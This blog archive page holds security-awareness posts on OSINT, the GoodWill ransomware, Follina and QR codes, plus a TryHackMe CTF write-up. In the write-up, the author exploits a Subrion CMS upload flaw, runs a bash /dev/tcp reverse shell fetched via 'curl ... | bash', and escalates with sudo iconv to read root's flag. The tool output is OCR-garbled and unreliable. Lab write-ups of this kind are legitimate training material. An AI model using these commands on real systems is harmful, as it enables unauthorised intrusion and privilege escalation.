Showing posts with label hacked. Show all posts
Showing posts with label hacked. Show all posts

Tuesday, June 21, 2022

Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch Blog.


 Today we will talk about OSINT.

 

            What is OSINT and how do you pronounce that?  Let’s start with the latter and work our way from there.  It is pronounced O SIN T, start with the O and say SIN, and end it with a T.  So what is OSINT, it stands for Open Source Intelligence, the meaning which is coming from Wikipedia is, “the collection and analysis of data gathered from open sources (overt and publicly available sources) to produce actionable intelligence.”  Basically, it means any source of information you can gather by publicly available means.  It’s the beginning steps that some hackers would take to investigate you and find out all they can so that hack or take advantage of you. 

 

            Are hackers the only ones that do this? Nope, it is not just hackers that use OSINT, it is business’s, law enforcement, or nation-state actors.  Businesses use OSINT to gather knowledge about consumers as to better market to them and thus increase profits.  Law enforcement use it to gather knowledge people they are trying to arrest, to build a better case on them.  Nation-state actors use this info to do all sorts of malicious things spear phishing (target phishing campaign) to industrial sabotage.  Nation-state actors can be some of the most highly trained and devoted hackers out there. 

 

            Your are probably asking yourself, how does this pertain to me?  OSINT can be used to learn more about you!  This is one reason I say to keep all your account private as much as possible and don’t overshare on social media.  But how do they find all this out?  Nowadays they have software out there that can do sweeps of the internet for certain usernames, email addresses, etc.  But the most common thing used today is called Google hacking or more commonly known as Google Dorking.  Techopedia defines Google Dorking as “a hacking technique that makes use of Google's advanced search services to locate valuable data or hard-to-find content.”  So you use advanced search services that are already baked into Google’s search engine,  In the next paragraph we will look into how this is done and ways you can use it to your benefit.

 

            So let say you wanted to search a website (lets say Target) for an item or items(lets say Pokemon), you could type in the Google search bar pokemon target and you’ll get things from Pokemon cards to toys to youtubers that went to target for Pokemon.  Now if we put in the Google search bar site:target.com “Pokemon”, this will search the Target website for anything that has the word Pokemon in it.  You can do this with any website and and search terms, I used this process when looking for ink for printers here at SMC.  There are tons that you can do with Google Dorking, I’ve linked a google dork cheat sheet in the sources if you care to look.

 

            Other the Google Dorking what are some other ways that people find OSINT.  Well once someone gets your name or even a username that you use on social media, video games, etc. they can start to build their OSINT on you by searching either of those terms and as they find more info it will give them more to search.  It’s like a snowball effect or an even more strange analogy where the person takes a penny and trades up to eventually have a car.  It is reasons like these I advocate that you use a Password Manager, 2FA, change accounts to private, and never trust anyone online or on the phone.  If you just do a couple of these then you will be ahead of so many people.

 

            I hope this has been eye-opening and gives you a better understanding of what OSINT is and how it can be used to help or harm you.  As always if you have a questions or concerns feel free to call or email me, I’d love to talk about it.  Also if you have any DR note topics you want me to discuss please let me know.  Until next week, I hope you have a great week and Be Awesome.

 


Source:

Open-source intelligence: https://en.wikipedia.org/wiki/Open-source_intelligence

Nation State Threat Actors: From a Security Awareness Perspective: https://www.sans.org/blog/nation-state-threat-actors-from-a-security-awareness-perspective/

What is Spear Phishing: https://www.knowbe4.com/spear-phishing/

Google Dorking: https://www.techopedia.com/definition/30938/google-dorking

Google Dork Cheatsheet: https://gist.github.com/sundowndev/283efaddbcf896ab405488330d1bbc06

OSINT Framework: https://osintframework.com

Tuesday, June 14, 2022

Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch Blog.


 Today we will talk about the "GoodWill" ransomware

 

Have you heard of this ransomware?  It is called "GoodWill" and it seems to aim at making you a better person.  You may be asking yourself how does it do this?  Well, I shall discuss with you how it is done.  First, your computer will need to be infected with this ransomware, this can be done like any other virus you get on your PC.  You clicked on a link you shouldn’t have, downloaded a pirated movie or game, went to that porn site, etc.  But now your computer is infected and there is only one way to get it decrypted.

 

Technically there are several "Activities" in this one way but we shall look at them one at a time.  The first "Activity" they require you to do is to cloth a roadside homeless person.  But you not only have to give them clothing, but you must also create a Facebook, Instagram, or Whatsapp story about clothing the homeless.  You must also use the photo frame they give you and encourage others to do it as well.  Once you do this then you have to send them an email with a screenshot of the post and the post link, here is my favorite part, it says and I quote "later our team will verify the whole case and promotes you for the next activity".  So then you have to wait till their team verifies what you have done, then you can move on to the next "Activity".  Let's look at the next "Activity" to see what our "GoodWill" entail.

 

The next "Activity" is to pick up 5 poor children from your neighborhood and take them out for dinner at Dominos, Pizza Hut, or KFC.  Then once again you will have to make a story post on your social media, this time though the kids have to be in the picture and have smiles on their faces.  You must again use their picture frame and take screenshots of the post, this time though you will need to take a picture of your receipt to send along with to the ransomware people.  Also again you will have to wait to have it verified before you can move on to the third and final "Activity".

 

The final "Activity", now requires you to go to your nearest hospital, and find someone that needs their care paid for because they don't have the money and pay their medical bill.  That's correct, you must go pay their medical bill, or as the ransomware states "provide them maximum part of the required amount."  You will also need to get selfies with the person you just paid their medical bill, record the whole conversation between you and them and send it back to the ransomware people.  But you’re not done yet, after you have done everything above you then need to and I quote, "Write a beautiful article on your Facebook and Instagram by sharing your wonderful experience to other people that how you transform yourself into a kind human being by becoming victim of a ransomware called Good Will".  So you not only have to do all these "goodwill" acts but at the end, you have to create a post saying that this ransomware has changed your life for the better.  Then hopefully this ransomware group with send you a decryption key that you can decrypt your files.

 

Well, I don't know about you but I don't need ransomware forcing me into performing "activities" and making me post about it on social media to create awareness about the plight of being a human.  Are these things happening, yes. Do you wish more people would help with these issues, yep.  Should you hi-jack someone’s files and force them into this position in the hope it will make them a better person in the end, nope.  Ransomware in any form no matter have "pure" your intentions are, is illegal.  The easiest way to fight against ransomware is to keep your computer up-to-date with the latest security updates and to have a good anti-virus in place.

 

I hope this has informed you about some of the newest ransomware that could not only impact your work system but even your computer at home.  If you have any questions feel free to leave a comment below.  If you have any ideas for future DR notes please let me know, and maybe it will be a future DR note.  I hope you are having a great week and Be Awesome!

 

 

 

Funny Tweets About Chuck E. Cheese

 

Sources:

 

New 'GoodWill' Ransomware Forces Victims to Donate Money and Clothes to the Poor: https://thehackernews.com/2022/05/new-goodwill-ransomware-forces-victims.html

 

Eerie GoodWill ransomware forces victims to publish videos of good deeds on social media: https://blog.malwarebytes.com/ransomware/2022/05/eerie-goodwill-ransomware-forces-victims-to-publish-videos-of-good-deeds-on-social-media/#:~:text=GoodWill%20ransomware%20functions%20like%20any,to%20recover%20your%20locked%20files.




Thursday, June 9, 2022

TryHackMe Tech_Supp0rt: 1 Write up

 Hack into the machine and investigate the target.

 

Please allow about 5 minutes for the machine to fully boot!

 

Note: The theme and security warnings encountered in this room are part of the challenge.

 

To start off I want to give a huge shout out to my source here. when ever I was stuck I would refer back to this walk through so please show him love and check it out!!!!!!!

 

Source: https://musyokaian.medium.com/tech-supp0rt-tryhackme-walkthough-dcb2376c0890

 

 

How to: So to start off make sure you have the machine booted up, and once it is boot copy the IP address of the target machine.  Make sure if you are not using the attackbox machine that you have your VM connected to the TryHackMe openvpn.  You can do this by first being in the same folder that you have the openvpn file, run the command sudo openvpn [name of the file.ovpn].  This will get you connect and be able to work with the target machine.

 

Now that you are connect to the TryHackMe VPN and have the IP address of the target machine time to do some recon, lets start off by doing an nmap scan.  The nmap scan I ran was nmap -A [ip of target machine],  the -A will enable OS detection, version detection, script scanning, and traceroute.  Here is the results of our nmap scan:

 

(gengartech@kali) — 
nmap -A 10.10. 87.69 
Starting Nmap 7 .92 ( https://nmap.org ) at 2022—06—08 20:08 EDT 
Nmap scan report f or L". 10.87.69 
Yost is up (0.088s latency) 
Not shown: 996 closed t cp ports (conn—refused) 
STATE SERVICE 
22/ t cp open ssh 
ssh—hostkey: 
VERSION 
OpenSSY 7 .2p2 Ubuntu 4ubuntu2.iO (Ubuntu Linux; 
protocol 2.0) 
2048 (RSA) 
256 (ECDSA) 
256 (ED25519) 
80/ t cp open 
'_http—t±tle: 
139/ t cp open 
445/ t cp open 
Service Info: 
ht tp 
Apache httpd 2 . 4.18 (Obuntu)) 
Apache2 Obuntu Default ? age: It works 
'_http—server—header: Apache/ 2.4 . 18 (Obuntu) 
Samba smbd 3 ..X — 4 . X (workgroup: WORKGROU?) 
netbios—ssn Samba smbd 4 . 3 . IL—Ubuntu (workgroup: WORKGROUP) 
Yost: OS: Linux; C?E: 
Yost script results: 
smb2—time : 
date: 
start_date: N/A 
account _ used: guest 
authentication level: user 
challenge _ response: supported 
message _ signing: disabled (dangerous, 
but default) 
Message signing enabled but not required 
OS: Windows 6.1 (Samba 4 . 3.11—0buntu) 
Computer name: techs upport 
NetBios computer name: 
Domain name: IxOO 
FODN: techsupport 
system time: 
: —Lh50mOLs, deviation: 3hIOm30s, median: 
clock—skew: mean 
Service detection performed. ? lease report any 
Nmap done: I? address host up) 
scanned ± n 
incorrect results at https://nmap . org'submit/ 
27.31 seconds

 

We can see that ports 22, 80, 139, and 445 are open.  The next scan to run would be smbmap, run it with smbmap -H [IP of target machine] -P 139, the -H is to set the host and the -P sets the port.  Here is the results of the smbmap scan:


(gengartech@kali) — J 
smbmap -E 10.10.87.69 
-P 239 
10.10.87.69 
Guest session 
Disk 
prints 
websvr 
Ubuntu)) 
10.10.87.69:139 
Name : 
Permissions 
NO ACCESS 
READ ONLY 
NO ACCESS 
Comment 
? r Inter Dr Ivers 
Service 
server 
( S amba

 

So as you can see the websvr is read only, so we might be able to take a peak inside.  Let us try using smbclient //[IP of target machine]/websvr.  When prompted for a password leave it blank and hit enter.  Now we are in the smbserver, you can list it's contents with the command ls , and we see an interesting file called enter.txt. We can download the file by using the command get enter.txt.  This will copy it over to your current directory.  You can now type exit in the smbserver to leave.  Now use the command cat enter.txt to view the text file.

 

a— (gengartech@kali) — J 
cat enter. txt 
l) Make fake popup and host it online on Digital Ocean server 
2) Fix sublion site, / subrion doesn't work, 
3) Edit wordpress website 
Sublion creas 
—sadm±n : 
Wordpress creds 
edit from panel 
[cooked with magical formula)

 

This gives us some good info and a hint.  For the Subrion creds it says cooked with a magical formula, that’s the hint, if you go to https://gchq.github.io/CyberChef/ copy the Subrion creds and paste it into Cyber Chef by the output you will see a magic want.  Click on the magic wand and it will give you the Subrion password which is:

 




So now we can hold that credential in our back pocket for now.  Next we can run another scan to check on any sub domains, we can do this by running Gobuster.  If you don't have Gobuster on your machine you can get it here (https://github.com/OJ/gobuster), once you get it then you can run it with this command, gobuster dir -u [IP of target machine]  -w /usr/share/dirb/wordlists/common.txt -t 4 ,  the dir is for directory mode, -u is to set the url, -w sets the wordlist, and -t sets how many threads you will use.  Here is the results of the Gobuster scan:

 

(gengartech@kali) — : — J 
gobuster —u http://LO 
Gobustel v3.I.O 
by OJ Reeves (@üheCoIoniaI) 
10:20 
.10. 87.69 
- /usr/share/dirb/wordlists/common.txt 
Christian Mehlmauer 
http://zo.10.87.69 
(@firefart) 
Method: 
Threads: 
Wordlist: 
Negative Status 
User Agent: 
Timeout: 
codes: 
/usr/ share/ dirt/ wordlists/common . txt 
gobusteI/3.I.O 
zos 
2022/06/08 10:18 
/ .htaccess 
/ . htpasswd 
/indey.. html 
/ php±nfo . php 
/ server—status 
/ test 
/wordpress 
2022/06/08 
: 42 
: 25 
Starting gobuster in directory 
enumeration 
mode 
(Status: 
(Status: 
(Status: 
(Status: 
(Status: 
(Status: 
(Status: 
(Status: 
Finished 
403) 
403) 
403) 
200) 
200) 
403) 
301) 
301) 
(Size: 
[Size: 
[Size: 
[Size: 
(Size: 
[Size: 
[Size: 
(Size: 
27 6 J 
276) 
27 6 : 
: 1321 J 
949231 
276) 
309) 
3141 
http 
http 
: //LO.LO 
: //LO.LO 
.87. 69/ test/l 
.87 .69/ wordpress/J

 

Now we have some of the server directories, we have a password lets see where we can get too.  If you look at the enter.txt file that we got from the smb server it says fix the subrion site, and edit from panel we can try this by opening up firefox and typing in [IP of Target Machine]/subrion/panel/ and it should take you to a login panel that we can put in the creds we got from the enter.txt.  Here is a picture of the login panel site:

 

Login :: Powered by Subric x + 
o a 10.10.87.69 
/subrion/panel/ 
Kali Linux Kali Tools Kali Docs Kali Forums Kali NetHunter 
Welcome to 
Subrion Admin Panel 
Exploit-DB 
Google Hacking DB 
admin 
O Remember me 
R OffSec 
Login 
Forgot your password? 
Powered by Subrion CMS v4.2.1 
Copyright •C' 2008-2022 Intelliants LLC 
Back to homepage

 

Now that we are inside if you look at the bottom left you will see the version of Subrion CMS that we are running.  The version is Subrion CMS v 4.2.1, we can search it to see if there are any exploits we can use.  We can start with searchsploit.  I ran the command searchsploit subrion cms 4.2.1, and got back 4 results.


(gengartech@kali) — 
searchspio±t subrion cms 4.2 
Exploit ütIe 
subrion CMS 4.2. 1 
subrion cys 4.2.1 
subrion CMS 4.2. 1 
— 'avatar [path)' XSS 
Arbitrary File Upload 
Cross Site Request Forgery 
Cross—site Scripting 
(CSRF) 
? ath 
php/webapps/49346. txt 
php/webapps/4 9876 . py 
php/webapps/ 50737 . txt 
php/webapps/45L50 . txt 
She 11 codes: 
No Results

 

I went with the second one, and to find the full path I ran this command searchsploit php/webapps/49876.py -p, and got back the path: /usr/share/exploitdb/exploits/php/webapps/49876.py.  I can now cp it over to my current directory by using the command sudo cp /usr/share/exploitdb/exploits/php/webapps/49876.py /home/[username], we use sudo since it is in an root area that requires root privileges' to copy.  Now that we have the file copied over to our current directory we can run it on the server using the following command, python3 49876.py -u http://[IP of Target Machine]/subrion/panel/ -l admin -p Hidden, the -u is to set the url, the -l is to set the user and -p sets the password.  Once this is run you should have a webshell on the subrion server:

 

So my next move was to try and upload linpeas to the server to see what weaknesses it had, I started a python simple HTTP and tried to curl over linpeas but it kept giving me errors so my next move was to go into the web panel and upload it that way.  Once you have logged in you can then click on content and then on upload.  You will see a floppy disk icon in uploads that you can use to upload a file.  This is how I uploaded linpeas.

 

Kali 
x 
Uploads Powered by S.. 
o a 10.10.201.29 
gengartech@kali: 
Lw 
Google Hacking DB 
gengartech@kali: I 
gengartech@kali: 
07:23AM O 
AZIae 
Uploads :: Powered by x 
Kali Linux Kali Tools Kali Docs Kali Forums Kali NetHunter •S Exploit-DB 
R OffSec 
Subrion 
al 
Cashboarc 
Content 
Memoers 
Financia 
Extensions 
GLOBAL 
Pages 
Menus 
Blocks 
Phrases 
Uploads 
EXTENDED 
Field Groups 
Fields 
Image Types 
EXTENSIONS 
Blog 
Uploads 
Dashboard 
Uploads 
uploads 
uploads 
hidzkecysldqyzd 
phar 
—geo •tic 
linpeas.sh, 319 KB 
0 
Items: 2, sum: 319 
6 direct input to this VM, move the mouse pointer inside or press Ctrl* G.

 

Once it is in there then run the command chmod 777 linpeas.sh, this will make linpeas executable on the system .  Then use the command ./linpeas.sh, now you won't see anything going on and maybe think that it froze but it will take a minute it is running.  When it is finished you will have a wealth of knowledge about the server, one thing that was found looks like the password to the word press site:

 


 

Also in the linpeas scan you find some programs you can run on this system and two users:

 

Avai I able 
Useful software 
/bin/nc 
/ bin/ netcat 
/ usr/b±n/wget 
/usr/b±n/curl 
/ bin / ping 
/usr/b±n/base64 
/ usr/bin/python 
/usr/bin/python2 
/usr/bin/python3 
/usr/b±n/python2.7 
/ usr/bin/perl 
/ usr/b±n/php 
/usr/bin/sudo 
/usr/b±n/lxc 
[+1 Installed Compiler 
/usr/share/gcc—5 
Software

 

[+1 Last 
Username 
root 
scamsite 
logon each 
user 
From 
Latest 
Sun Nov 
F r i May 
28 
-0530 
-0530 
2021 
2021

 

So then I created a simple reverse shell script using nano shell.sh, and putting in it bash -i >& /dev/tcp/[IP of Attack Machine]/4444 0>&1. Make sure you have nc listening and the python simple HTTP server sending, first the nc, on your attack machine for the call too, I did this with the command  nc -lnvp 4444

 

21 stenlng on 
44 44

 

Then the python simple HTTP server can be ran with this command  python -m SimpleHTTPServer, the -m run library module as a script:

 

(gengartech@kali) — : — J 
python —m Simple." T T? Server 
Ser v ÃŽng on 0.0.0.0 port 8000

 

From there on the target machine run the command curl [IP of Attack Machine]:8000/shell.sh | bash , this will get the script and run it on the target machine calling back to the nc listening port we started on our attack machine:

 

(gengartechS kali ) — I — ) 
I isten±ng on (any) 
connect to (L O. 6.1. 2351 
from (UNKNOWN) (10.10.201.29) 49180 
bash: cannot set terminal process group : Inappropriate 
bash: no job control in this shell 
: /var/waw/html/ subrion/upIoadsS Is 
loc t I 
f or 
device

 

Now that we have a reverse shell I made my way to the tmp folder using cd /tmp, then I checked to see if python was on this machine with the command which python:

 

which python 
which python 
/ usr/b±n/python

 

Now its time to upgrade our shell so we can run commands like sudo and su. To do this you will need to run this python command python -c 'import pty;pty.spawn("/bin/bash")' , this will allow you to run more commands on the system.  Now we can use  su scamsite to see if we can move over to that terminal.  Once we do su scamsite it will prompt for a password so we can try the ones we know already: these are hidden and you must do the room to find them. The second password worked and we are now scamsite!


I ran the sudo -l  command to see what can be run through scam site:

 

sudo —I 
sudo —Z 
Matching Defaults entries for scams±te on lechSupport : 
env_reset, 
: /usr/ local,' bin 1 : ,'usr/sbinkv : /usr/bin\v : /sbin\v : /bin\v : /snap/bin 
User scams±te may run the following commands on TechSupport : 
(ALL) NO?ASSWD:

 

Then once I saw that iconv could be run I went to GTFObins to see how I could use it:

 

Sudo 
If the binary is allowed to run as superuser by sudo it does not drop the elevated privileges and may be used to 
access the file system, escalate or maintain privileged access. 
LFILE=fiIe to read 
. /iconv 
-f 8859 1 -t 8859 1 
"$LFILE"

 

So after trying a failing at it a could times I tried sudo -u root iconv -f 8859_1 -t 8859_1 "/root/root.txt" , and it worked!!!! I got the flag copied it over and pasted it in TryHackMe.

 

sudo —u root iconv —f 8859_1 
<sudo —u root ± conv —f 8859 1 —t 8859 
" / root / root. txt" 
90b 
-t 8859 
" / root/root. txt"

 

Again huge shout out to my source here when ever I was stuck I would refer back to this walk through so please show him love and check it out!!!!!!!

 

Source: https://musyokaian.medium.com/tech-supp0rt-tryhackme-walkthough-dcb2376c0890

 

Answer the questions below

 

What is the root.txt flag?

 

Answer: You wont get it that easlily!!!

 

 

From <https://tryhackme.com/room/techsupp0rt1



Tuesday, May 31, 2022

Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch.

 Today we will talk about Follina 

                What is Follina?  Follina or CVE-2022-30190 is a zero-day exploit that uses Microsoft Word documents to execute Powershell code on your computer.  In the original document, the file has other hidden files inside of it by the use of compression, it is a .rar file.  So that once the document file is executed or run, you would reach out to a website to grab an HTML file.  This file would then run automatically, it would start a hidden command prompt window.  This hidden window would shut down the msdt (Microsoft Diagnostic Tool) program, it would then go through looking for a certain file that is encoded.  It would then save that file, decode that file, bring that file to the current directory, and execute a file called rgb.exe.  At the moment the rgb.exe file is unknown, meaning the infosec community isn’t sure what this file did, but what we do know is this is a form of RCE.

                 What is RCE?  RCE stands for remote code execution, it basically means that an attacker can create a file or program which I will refer to in the rest of this as a payload.  The payload will then be transferred over to someone else’s computer via any number of ways; i.e. email, USB stick, download, etc.  Once the payload is on the target system, it will need to be executed for the RCE to take effect.  Now RCE can be a lot of things, once it’s executed it could create a shell that gives the attacker access to your machine, it could execute ransomware, could add your machine to a bot-net (a future DR note), a bitcoin miner. Suffice it to say a lot can happen to your machine if it is run.

                 Do we need to worry about Follina?  Yes and no, at the time of writing this Microsoft is saying that it will be detected by Defender (Microsoft’s anti-virus) and will be labeled as “Mesdetty” and “Mesdetty Launch”.  Now let me explain why you should and shouldn’t worry about this.  Like all modern cyber threats, you should have concern enough to keep an eye out for it, but as of right now it doesn’t seem to be much of a threat because it hasn’t been used against anyone.  Not saying it won’t be used in the future but currently, it was pointed out that at the time of writing this no one has been a victim of this attack. 

                If you want to know more about Follina or CVE-2022-30190, check out my sources at the bottom of the email.  Also if you have any questions or if you have any topics you’d like me to discuss on a future DR note, please email me and let me know.  I hope everyone has a great week and Be Awesome!

Monday, May 16, 2022

Welcome to DR's note, your weekly dose of knowledge from Circuit Stitch.

This week we will be talking about QR codes.

    Why do we need to talk about these, they are harmless, right?  Wrong!!  These little codes can lead to different places or even download malicious code to your devices.  You should never scan an unknown QR code, if you see one out in the wild on a bulletin board or on a phone pole, never scan it.  If someone you don't know starts to talk to you and then says oh do you want my contact info, then tries to get you to scan a QR code, DON'T. 

    So how does the QR code work then, let me break down the step.  First off, QR stands for Quick Response code, it was developed back in 1994 by a Japanese developer.  Smartphone camera software usually has some lines of code in it to be able to scan QR codes.    QR codes have multiple parts, but three are the most important, and you will see them on most if not all QR codes.  The three parts are the Data module, the Position marker, and the Quiet Zone.  The data module is the black and white area inside QR codes that are scanned, this is the part that will then tell the software where to go once scanned.  The position maker is the three-square boxes you see on all QR codes, they are used to tell the camera what position the QR code is in, so it can be scanned properly.  The last is the quiet zone, which is the white area around the entire QR code.  That blank area is used to let the camera know where the QR code starts and ends.  Now we know the parts of the QR code, it makes it a little simpler how they are scanned.  To put it in its basic terms, they are fancy barcodes, plain and simple. 

    QR codes can do a number of things, both good and bad.  I tend to err on the side of caution and not scan QR codes, all it takes is for someone to replace that good QR code with one that downloads malware or goes to a malicious site.  I hope this has informed you of the dangers we face from QR codes.  If you have any questions, please email me or call.  Thank you and have a great week.

go ahead scan it you know you want too 😈

TryHackMe Write-Up | Sysinternals Task 9  Miscellaneous

BgInfo "It automatically displays relevant information about a Windows computer on the desktop's background, such as the computer ...